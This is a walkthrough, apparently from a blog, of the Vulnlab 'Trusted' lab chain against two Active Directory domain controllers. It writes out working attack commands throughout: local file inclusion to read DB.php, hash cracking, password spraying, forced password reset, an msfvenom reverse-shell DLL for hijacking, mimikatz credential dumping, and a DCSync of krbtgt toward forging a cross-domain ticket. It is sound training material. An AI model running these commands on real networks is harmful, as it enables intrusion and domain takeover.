Vulnlab - Trusted (Chain) - Easy
Warning
I did this chain in two times, meaning that the IPs have changed during the Walktrhough. To make it clear :
- 10.10.182.134 = 10.10.132.102 = labdc.lab.trusted.vl
- 10.10.182.133 = 10.10.132.101 = trusteddc.trusted.vl
LABDC.LAB.TRUSTED.VL
Initial Access
As always, let’s begin with a nmap scan to discovers what services are available to us :
$ nmap -sV -sC -p- -A --max-retries 2 -n 10.10.182.134
Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-19 12:17 CET
Nmap scan report for 10.10.182.134
Host is up (0.021s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.182.134/dashboard/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-19 11:18:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.182.134/dashboard/
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 10
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, IgnoreSigpipes, Speaks41ProtocolOld, SupportsLoadDataLocal, SupportsTransactions, FoundRows, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsCompression, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: ~AhfJ{OWJJr%\"2tth/L
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-19T11:19:40+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2025-01-18T11:13:04
|_Not valid after: 2025-07-20T11:13:04
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-19T11:19:31+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49380/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
62354/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/19%OT=53%CT=1%CU=39030%PV=Y%DS=2%DC=T%G=Y%TM=678CDFC
OS:E%P=aarch64-unknown-linux-gnu)SEQ(SP=108%GCD=1%ISR=106%TI=I%CI=I%II=I%SS
OS:=S%TS=A)OPS(O1=M4D4NW8ST11%O2=M4D4NW8ST11%O3=M4D4NW8NNT11%O4=M4D4NW8ST11
OS:%O5=M4D4NW8ST11%O6=M4D4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%
OS:W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4D4NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=8
OS:0%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-19T11:19:34
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 21.46 ms 10.8.0.1
2 21.72 ms 10.10.182.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.61 seconds
There’s a lot of interesting services here, first thing to see is that we are facing a domain controller. Let’s start with the most common services during an assesment, HTTP. Once we have opened a web browser and gone to the website (either port 443 or 80 seems to be the same in term of content), we see that XAMPP is running :
Let’s do a little bit of fuzzing with Feroxbuster (did I already told you it’s my favorite content discovery tool ?):
$ ./feroxbuster -u https://10.10.182.134 -x html php md txt --insecure
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ https://10.10.182.134
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
🔎 Extract Links │ true
💲 Extensions │ [html, php, md, txt]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 30w 303c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 300c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c https://10.10.182.134/ => https://10.10.182.134/dashboard/
301 GET 9l 30w 338c https://10.10.182.134/img => https://10.10.182.134/img/
200 GET 5l 9w 694c https://10.10.182.134/img/module_table_top.png
200 GET 3l 16w 1549c https://10.10.182.134/img/module_table_bottom.png
301 GET 9l 30w 338c https://10.10.182.134/dev => https://10.10.182.134/dev/
301 GET 9l 30w 345c https://10.10.182.134/dev/images => https://10.10.182.134/dev/images/
301 GET 9l 30w 342c https://10.10.182.134/dev/css => https://10.10.182.134/dev/css/
200 GET 30l 162w 11333c https://10.10.182.134/dev/images/smile.jpg
200 GET 7l 79w 5370c https://10.10.182.134/dev/images/icons.png
200 GET 49l 133w 4060c https://10.10.182.134/dev/images/bg-footnote.jpg
200 GET 46l 296w 21946c https://10.10.182.134/dev/images/bride.jpg
200 GET 612l 1583w 11331c https://10.10.182.134/dev/css/style.css
200 GET 5l 44w 1353c https://10.10.182.134/dev/images/bg-header.jpg
200 GET 68l 415w 34142c https://10.10.182.134/dev/images/children.jpg
200 GET 15l 97w 6647c https://10.10.182.134/dev/images/thumbnail-focus.jpg
200 GET 31l 195w 17155c https://10.10.182.134/dev/images/logo.png
200 GET 34l 342w 17551c https://10.10.182.134/dev/images/frames.png
200 GET 80l 208w 2311c https://10.10.182.134/dev/index.html
200 GET 75l 156w 1967c https://10.10.182.134/dev/contact.html
200 GET 72l 397w 29702c https://10.10.182.134/dev/images/happy.jpg
200 GET 131l 991w 62256c https://10.10.182.134/dev/images/thumb-up.jpg
200 GET 27l 156w 11991c https://10.10.182.134/dev/images/handshake.jpg
200 GET 315l 1842w 149229c https://10.10.182.134/dev/images/family.png
200 GET 56l 262w 21931c https://10.10.182.134/dev/images/divorce.jpg
200 GET 58l 382w 37111c https://10.10.182.134/dev/images/prenuptial.jpg
302 GET 0l 0w 0c https://10.10.182.134/index.php => https://10.10.182.134/dashboard/
200 GET 323l 924w 79670c https://10.10.182.134/dev/images/family-large.jpg
200 GET 37l 173w 10393c https://10.10.182.134/dev/images/bride-sideview.jpg
200 GET 24l 156w 11896c https://10.10.182.134/dev/images/family-small.jpg
200 GET 14l 105w 7671c https://10.10.182.134/dev/images/thumbnail-smile.jpg
200 GET 109l 603w 50334c https://10.10.182.134/dev/images/laughing.jpg
200 GET 35l 209w 17125c https://10.10.182.134/dev/images/meeting.jpg
200 GET 6l 56w 3225c https://10.10.182.134/dev/images/bg-footer.png
200 GET 8l 91w 5615c https://10.10.182.134/dev/images/thumbnail-frontview.jpg
200 GET 16l 93w 6429c https://10.10.182.134/dev/images/thumbnail-sideview.jpg
200 GET 11l 103w 5860c https://10.10.182.134/dev/images/thumbnail-happy.jpg
200 GET 6l 108w 4672c https://10.10.182.134/dev/images/interface.png
200 GET 3l 41w 1019c https://10.10.182.134/dev/images/border.png
200 GET 1l 2w 22c https://10.10.182.134/dev/db.php
200 GET 65l 460w 43646c https://10.10.182.134/dev/images/bg-adbox.png
301 GET 9l 30w 345c https://10.10.182.134/dev/Images => https://10.10.182.134/dev/Images/
200 GET 6l 56w 3225c https://10.10.182.134/dev/Images/bg-footer.png
200 GET 56l 262w 21931c https://10.10.182.134/dev/Images/divorce.jpg
200 GET 7l 79w 5370c https://10.10.182.134/dev/Images/icons.png
200 GET 3l 41w 1019c https://10.10.182.134/dev/Images/border.png
200 GET 24l 156w 11896c https://10.10.182.134/dev/Images/family-small.jpg
200 GET 6l 108w 4672c https://10.10.182.134/dev/Images/interface.png
200 GET 37l 173w 10393c https://10.10.182.134/dev/Images/bride-sideview.jpg
200 GET 11l 103w 5860c https://10.10.182.134/dev/Images/thumbnail-happy.jpg
200 GET 16l 93w 6429c https://10.10.182.134/dev/Images/thumbnail-sideview.jpg
200 GET 30l 162w 11333c https://10.10.182.134/dev/Images/smile.jpg
200 GET 15l 97w 6647c https://10.10.182.134/dev/Images/thumbnail-focus.jpg
200 GET 31l 195w 17155c https://10.10.182.134/dev/Images/logo.png
200 GET 27l 156w 11991c https://10.10.182.134/dev/Images/handshake.jpg
200 GET 14l 105w 7671c https://10.10.182.134/dev/Images/thumbnail-smile.jpg
200 GET 49l 133w 4060c https://10.10.182.134/dev/Images/bg-footnote.jpg
200 GET 8l 91w 5615c https://10.10.182.134/dev/Images/thumbnail-frontview.jpg
200 GET 5l 44w 1353c https://10.10.182.134/dev/Images/bg-header.jpg
200 GET 58l 382w 37111c https://10.10.182.134/dev/Images/prenuptial.jpg
200 GET 41l 94w 1177c https://10.10.182.134/dev/about.html
200 GET 46l 296w 21946c https://10.10.182.134/dev/Images/bride.jpg
200 GET 34l 342w 17551c https://10.10.182.134/dev/Images/frames.png
200 GET 68l 415w 34142c https://10.10.182.134/dev/Images/children.jpg
200 GET 35l 209w 17125c https://10.10.182.134/dev/Images/meeting.jpg
200 GET 72l 397w 29702c https://10.10.182.134/dev/Images/happy.jpg
200 GET 131l 991w 62256c https://10.10.182.134/dev/Images/thumb-up.jpg
200 GET 65l 460w 43646c https://10.10.182.134/dev/Images/bg-adbox.png
200 GET 109l 603w 50334c https://10.10.182.134/dev/Images/laughing.jpg
200 GET 323l 924w 79670c https://10.10.182.134/dev/Images/family-large.jpg
200 GET 315l 1842w 149229c https://10.10.182.134/dev/Images/family.png
301 GET 9l 30w 342c https://10.10.182.134/dev/CSS => https://10.10.182.134/dev/CSS/
200 GET 612l 1583w 11331c https://10.10.182.134/dev/CSS/style.css
301 GET 9l 30w 344c https://10.10.182.134/dashboard => https://10.10.182.134/dashboard/
200 GET 8l 76w 4088c https://10.10.182.134/dashboard/images/fastly-logo@2x.png
200 GET 167l 649w 7576c https://10.10.182.134/dashboard/index.html
200 GET 79l 250w 3607c https://10.10.182.134/applications.html
200 GET 7l 57w 2442c https://10.10.182.134/dashboard/images/fastly-logo.png
200 GET 17l 21w 177c https://10.10.182.134/bitnami.css
200 GET 131l 390w 6021c https://10.10.182.134/dashboard/howto.html
301 GET 9l 30w 351c https://10.10.182.134/dashboard/images => https://10.10.182.134/dashboard/images/
301 GET 9l 30w 347c https://10.10.182.134/dashboard/de => https://10.10.182.134/dashboard/de/
301 GET 9l 30w 347c https://10.10.182.134/dashboard/fr => https://10.10.182.134/dashboard/fr/
301 GET 9l 30w 347c https://10.10.182.134/dashboard/it => https://10.10.182.134/dashboard/it/
301 GET 9l 30w 347c https://10.10.182.134/dashboard/ru => https://10.10.182.134/dashboard/ru/
200 GET 523l 3762w 31751c https://10.10.182.134/dashboard/faq.html
200 GET 916l 4881w 81049c https://10.10.182.134/dashboard/phpinfo.php
503 GET 11l 44w 403c https://10.10.182.134/examples
301 GET 9l 30w 347c https://10.10.182.134/dashboard/ro => https://10.10.182.134/dashboard/ro/
301 GET 9l 30w 342c https://10.10.182.134/dev/Css => https://10.10.182.134/dev/Css/
200 GET 16l 155w 10943c https://10.10.182.134/dashboard/images/sourceforge-logo.png
200 GET 15l 93w 6731c https://10.10.182.134/dashboard/images/pdf-icon.png
200 GET 5l 47w 2036c https://10.10.182.134/dashboard/images/apple-logo.png
200 GET 40l 202w 14635c https://10.10.182.134/dashboard/images/xampp-newsletter-logo.png
200 GET 85l 555w 39860c https://10.10.182.134/dashboard/images/bitnami-xampp.png
200 GET 54l 286w 26141c https://10.10.182.134/dashboard/images/xampp-cloud.png
200 GET 145l 689w 57729c https://10.10.182.134/dashboard/images/stack-icons@2x.png
200 GET 117l 672w 61339c https://10.10.182.134/dashboard/images/xampp-cloud@2x.png
200 GET 27l 253w 19113c https://10.10.182.134/dashboard/images/sourceforge-logo@2x.png
200 GET 9147l 36448w 481698c https://10.10.182.134/dashboard/stylesheets/all.css
200 GET 385l 1620w 180620c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-run-installer.jpg
200 GET 192l 819w 111554c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-launch-credentials.jpg
200 GET 190l 939w 149693c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-stack-manager-services.jpg
200 GET 198l 879w 148586c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-stack-manager.jpg
200 GET 167l 656w 7702c https://10.10.182.134/dashboard/it/index.html
200 GET 523l 3892w 34144c https://10.10.182.134/dashboard/it/faq.html
200 GET 1071l 7077w 888496c https://10.10.182.134/dashboard/images/screenshots/xampp-linux-start.jpg
301 GET 9l 30w 345c https://10.10.182.134/dev/IMAGES => https://10.10.182.134/dev/IMAGES/
301 GET 9l 30w 347c https://10.10.182.134/dashboard/ES => https://10.10.182.134/dashboard/ES/
200 GET 167l 665w 7776c https://10.10.182.134/dashboard/ro/index.html
200 GET 523l 3739w 34016c https://10.10.182.134/dashboard/ro/FAQ.html
200 GET 131l 390w 6084c https://10.10.182.134/dashboard/ru/howto.html
403 GET 11l 47w 422c https://10.10.182.134/server-status
301 GET 9l 30w 356c https://10.10.182.134/dashboard/JavaScripts => https://10.10.182.134/dashboard/JavaScripts/
Feroxbuster arguments
-u: is for the path where we want to perform the fuzzing-x: is to add extensions to test--insecure: is for HTTPS website where the certificate is not verified
We found a directory called dev, it looks like it’s not something common to xampp. go take a look :
There’s one really useful information here, someone told to Eric to check if the database connection is not working… We previously found a file called DB.php, keep it in somewhere in your mind.
If you click on the HOME link, a GET parameter appear :
When I see a GET parameter, I just want to try if it is vulnerable to LFI (Local File Inclusion), and that’s the case :
I hope you remember that we found a file DB.php. Since there’s a LFI it means we can access and read this file, the problem is that a web brower can’t directly read PHP files.
Thanks to PHP, there’s some useful filter that can help us to read the content, the one we are going to use is convert.base64-encode :
The next step now is to decode this base64 encoded string, you can do it directory with Burp or with the cli, as you prefer :
With the creds in our hands, we can try to connect remotly to the database, if you remeber there’s a mysql service running on port 3306 :
$ mysql -u root -p -h 10.10.182.134
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.4.24-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
After few enumerations, I found a database called news where there’s a table users and 3 users are inside it :
MariaDB [phpmyadmin]> use news;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [news]> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users |
+----------------+
1 row in set (0.028 sec)
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+----------------------------------+
| 1 | Robert | rsmith | Smith | 7e7abb54bb<REDACTED> |
| 2 | Eric | ewalters | Walters | d6e81aeb4d<REDACTED> |
| 3 | Christine | cpowers | Powers | e3d3eb0f46<REDACTED> |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.027 sec)
A good habits to have is to create a file for the users and the credentials you find during your assesments, it can later be useful for some password spraying.
So, let’s try to crack theses hashes with hashcat :
$ hashcat --hash-type 0 --attack-mode 0 hashes `fzf-wordlists`
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
7e7abb54bb<REDACTED>:<REDACTED>
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6708.5 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 46%
Hashcat arguments
--hash-type: is to specify the hash (in our case 0 stands for MD5)--attack-mode: is to specify we want to do a straight attack (0)
We were able to crack only one of the three hashes, let’s do a little password spraying with NetExec to see which one of the users can connect with this password :
$ nxc smb 10.10.182.134 -u users -p '<REDACTED>'
SMB 10.10.182.134 445 LABDC [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB 10.10.182.134 445 LABDC [+] lab.trusted.vl\rsmith:<REDACTED>
Lateral Movement
We now have a foothold to the domain lab.trusted.vl, what I like to do when it’s the case is to collect the objects of the domain to enumerate DACLs. To do that I use Rusthound :
$ rusthound -d 'lab.trusted.vl' -u 'rsmith@lab.trusted.vl' -p '<REDACTED>' -i 10.10.182.134 -z -o .
---------------------------------------------------
Initializing RustHound at 14:38:08 on 01/19/25
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2025-01-19T13:38:08Z INFO rusthound] Verbosity level: Info
[2025-01-19T13:38:08Z INFO rusthound::ldap] Connected to LAB.TRUSTED.VL Active Directory!
[2025-01-19T13:38:08Z INFO rusthound::ldap] Starting data collection...
[2025-01-19T13:38:08Z INFO rusthound::ldap] All data collected for NamingContext DC=lab,DC=trusted,DC=vl
[2025-01-19T13:38:08Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2025-01-19T13:38:08Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2025-01-19T13:38:08Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2025-01-19T13:38:08Z INFO rusthound::json::checker] Starting checker to replace some values...
[2025-01-19T13:38:08Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 8 users parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 55 groups parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 1 computers parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 5 ous parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 1 domains parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 2 gpos parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] 21 containers parsed!
[2025-01-19T13:38:08Z INFO rusthound::json::maker] ./20250119143808_lab-trusted-vl_rusthound.zip created!
RustHound Enumeration Completed at 14:38:08 on 01/19/25! Happy Graphing!
Rusthound arguments
-d: is for the domain-u: is for the user we are going to bind through LDAP-p: is for the password-z: is to tell rusthound that we want all the .json in a zip-o: is for the output directory
In BloodHound, if we take a look at the DACLs for the user rsmith@lab.trusted.vl, we see he has the privilege ForceChangePassword over ewalters@lab.trusted.vl, meaning this user can modify the password without the need of knowing the original one.
To abuse this DACL, we use the net command from the samba package :
$ net rpc password 'ewalters' 'TakeALookAtExegol123!' -U 'lab.trusted.vl'/'rsmith'%'<REDACTED>' -S 10.10.182.134
We have now an access to the machine, if we go back to BloodHound we see that ewalters@lab.trusted.vl is member of Remote Management Users group :
Privilege Escalation
Once connected through WinRM, using Evil-WinRM, we see a directory called AVTest and inside it we found two files.
The first one is a readme.txt :
*Evil-WinRM* PS C:\AVTest> type "C:/AVTest/readme.txt"
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.
Let's just hope we don't have to set this lab up again because of this.
The message says that Christine has to run the program a few times “just to be sure”. Maybe it means that there’s a scheduled task which is running the program ?
The other program inside this directory is a program called KasperskyRemovalTool.exe.
After a few try, I decided to run the program with ProcMon to see if some dlls are used :
What is interesting in this case is that some DLLs are loaded directly from the same directory where the program is. It means, we can potentially include a malicious dll to execute malicious code ? Let’s give it a try.
First, we need to create the malicious dll with msfvenom, it needs to have the exact same name than the loaded dll we saw with procmon :
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.242 LPORT=4444 -f dll > KasperskyRemovalToolLOC.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Msfvenom arguments
-p: is to specify what kind of payload we useLHOST: is where we specify our ip addressLPORT: is the port where we want to send the connection-f: is to specify the format (in our case a dll)
The second step is to upload this dll in the same directory than the program, and after 20-30 seconds, we have a reverse shell connection as cpowers@lab.trusted.vl :
nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.132.102.
Ncat: Connection from 10.10.132.102:61114.
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
lab\cpowers
This user is member of Domain Admins group :
C:\Windows\system32>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
LAB\Domain Admins Group S-1-5-21-2241985869-2159962460-1278545866-512 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
LAB\Denied RODC Password Replication Group Alias S-1-5-21-2241985869-2159962460-1278545866-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
TRUSTEDDC.TRUSTED.VL
Trust relationship abuse
The name of this chain says it all, for sure there’s a trust relationship between these two domains, but just to be sure let’s use PowerView :
PS C:\Users\Public> Get-DomainTrust -Domain lab.trusted.vl
Get-DomainTrust -Domain lab.trusted.vl
SourceName : lab.trusted.vl
TargetName : trusted.vl
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 9/14/2022 6:42:24 PM
WhenChanged : 1/19/2025 4:51:01 PM
Here we can see that there’s a parent-child trust relationship between lab.trusted.vl and trusted.vl. A parent-child relationship is always bidirectionnal and transitive.
Since we are member Domain Admins groups, we can create a TGT to access ressources of trusted.vl as Enterprise Admins. It is possible thanks to the sIDHistory attribute, here a fabulous article.
First step, is to retrieve the NT hash of cpowers to do all the operations from linux and not windows, personnal preference. To do that I use SafetyKatz :
C:\Users\Public>SafetyKatz.exe "sekurlsa::ekeys" "exit"
SafetyKatz.exe "sekurlsa::ekeys" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 3803478 (00000000:003a0956)
Session : Batch from 0
User Name : cpowers
Domain : LAB
Logon Server : LABDC
Logon Time : 1/19/2025 6:13:01 PM
SID : S-1-5-21-2241985869-2159962460-1278545866-1107
* Username : cpowers
* Domain : LAB.TRUSTED.VL
* Password : (null)
* Key List :
aes256_hmac cfd7dce3d0c1a17ae08fc653769d<REDACTED>
rc4_hmac_nt 322db798a55<REDACTED>
rc4_hmac_old 322db798a55<REDACTED>
rc4_md4 322db798a55<REDACTED>
rc4_hmac_nt_exp 322db798a55<REDACTED>
rc4_hmac_old_exp 322db798a55<REDACTED>
Authentication Id : 0 ; 59338 (00000000:0000e7ca)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/19/2025 4:35:21 PM
SID : S-1-5-90-0-1
Second step, is to retrieve the hash of krbtgt account of the child domain, in our case of lab.trusted.vl. We need the hash of this account because TGT are encrypted with the hash of krbtgt account (not the only one reason, but it’s to make it simple).
To do that we can use secretsdump :
$ secretsdump lab.trusted.vl/cpowers@10.10.132.102 -just-dc-user LAB/krbtgt -hashes :322db798a55<REDACTED>
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404<REDACTED>:c7a03c565c68c<REDACTED>:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafaw<REDACTED>
krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf22<REDACTED>
[*] Cleaning up...
secretsdump arguments
domain/user@ip: the information of the user we own to perform the DCSync-just-dc-user: is to retrieve only the account specified, not all NTDS-hashes: is where we specify the hash to perform PtH
Third step, we need to have the SID of the child domain, in our case lab.trusted.vl :
$ lookupsid.py -hashes :"322db798a55f8<REDACTED>" "lab.trusted.vl"/cpowers@"10.10.132.102" | grep "Domain SID"
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866
Fourth step is to grab the SID of the parent domain, in our case trusted.vl, and add it the RID 519 for Enterprise Admins groups :
PS C:\Users\Public> Get-DomainSID -Domain trusted.vl
Get-DomainSID -Domain trusted.vl
S-1-5-21-3576695518-347000760-3731839591
We can now forge our ticket, with ticketer.py :
